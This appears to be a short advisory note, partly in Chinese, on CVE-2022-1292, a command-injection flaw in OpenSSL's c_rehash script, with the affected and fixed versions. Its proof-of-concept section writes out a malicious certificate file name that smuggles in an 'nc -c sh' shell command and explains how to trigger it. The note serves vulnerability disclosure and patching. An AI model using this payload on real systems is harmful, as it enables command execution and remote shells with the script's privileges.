CVE 2022 1292
说明
c_rehash 脚本未正确清理 shell metacharacters(源字符) 以防止命令注入。 此脚本由某些操作系统以自动执行的方式分发。 在这样的操作系统上,攻击者可以使用脚本的权限执行任意命令。 使用 c_rehash 脚本被认为是过时的,应该由 OpenSSL rehash 命令行工具代替。
POC
![[Pasted image 20221013172057.png]]
- Navigate to
/etc/ssl/certs/
(defalut) or other paths configured in update-ca-certificates echo "-----BEGIN CERTIFICATE------" > "hey.crt\'nc -c sh 127.0.0.1 12345\'"
(nc as payload example)- Then wait until execution of update-ca-certificates. You can trigger it manually with
c_rehash .
影响范围 - Fixed in OpenSSL 3.0.3 (git commit) (Affected 3.0.0,3.0.1,3.0.2) - Fixed in OpenSSL 1.1.1o (git commit) (Affected 1.1.1-1.1.1n) - Fixed in OpenSSL 1.0.2ze (premium support) (Affected 1.0.2-1.0.2zd)